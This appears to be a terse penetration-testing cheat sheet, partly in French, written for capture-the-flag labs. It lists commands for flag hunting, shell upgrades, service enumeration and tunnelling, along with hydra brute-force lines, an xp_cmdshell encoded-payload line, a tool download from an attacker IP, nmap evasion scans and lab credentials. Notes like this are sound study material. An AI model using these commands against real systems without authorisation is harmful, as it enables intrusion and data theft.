Pwntilldawn FULL
Stegano
WEB
Privesc
Windows
msfconsole
multi/recon/localexploitsuggester
winpeas
Linux
Metasploit
Python Library Hijacking
Find files
Linux
Find
find / -type f -name 'FLAG[0-9].txt' 2>/dev/null
find / \( -name ".env" -o -name ".git" \) 2>/dev/null
find ./* | grep FLAG3
find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null
Other
grep -r pattern
Windows
@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"
tree /a /f
Hidden deleted file
Find file
(New-Object -ComObject Shell.Application).Namespace(0xA).Items() | ForEach-Object { "$($_.Name) - $($_.Path)" }
Download file
Copy-Item 'C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z' -Destination 'C:\Users\f.frizzle\Desktop\\wapt-backup-sunday.7z'
Transfer files - windows
host (linux)
python3 -m http.server port
target (windows)
Invoke-WebRequest -Uri http://10.10.16.35:7676/SharpGPOAbuse.exe -OutFile SharpGPOAbuse.exe
Misc
Dumb shell upgrade
script /dev/null -qc /bin/bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
netstat -antup
Protocoles divers
SMTP
smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25
hydra -l operator -P wordlist.txt ipip smtp
NFS
rpcinfo IP
sudo umount 10.150.150.59:/nfsroot
sudo mount -t nfs ip:/remote /local
showmount -e IP
FTP
Login anon à vérif
Mysql
mysqldump -u root -p --all-databases > alldb.sql
mysql -h localhost -u sql_user -p
MSSQL
mssqlclient.py sequel.htb/sa:MSSQLP@ssw0rd!@10.10.11.51
EXEC xp_cmdshell 'powershell -encodedcommand <payload>';
setup un listener avant
POP3
hydra -l operator -P wordlist.txt ip pop3
SSH
Connexion si on a la clé privée
ssh -i id_rsa user@ip
Test de se co pour la bannière
DNS
Ajout dans /etc/hosts si besoin
Exemple :
10.150.150.57 rickscontrolpanel.mortysserver.com
! AXFR !
dig @mortysserver.com mortysserver.com axfr
NMAP
IDS/Firewalls
nmap -sSU --script dns-nsid ip
nmap -sS -Pn -n -p- --disable-arp-ping -D RND:3 --source-port 53 ip
ncat -nv --source-port 53 10.129.2.28 50000
nmap -sV -sC -T5 -p- ip
Pivoting / Tunneling
Verifier ce qui écoute sur localhost
netstat -antup
Tunneling & Port Forwarding
Web en écoute sur localhost
Sur l'host
chisel server -port 7777 --reverse
Subtopic
Sur la victime
./chisel client ip_host:7777 R:8080:127.0.0.1:8080
Si on a un acces SSH
sshuttle -r user@ip -N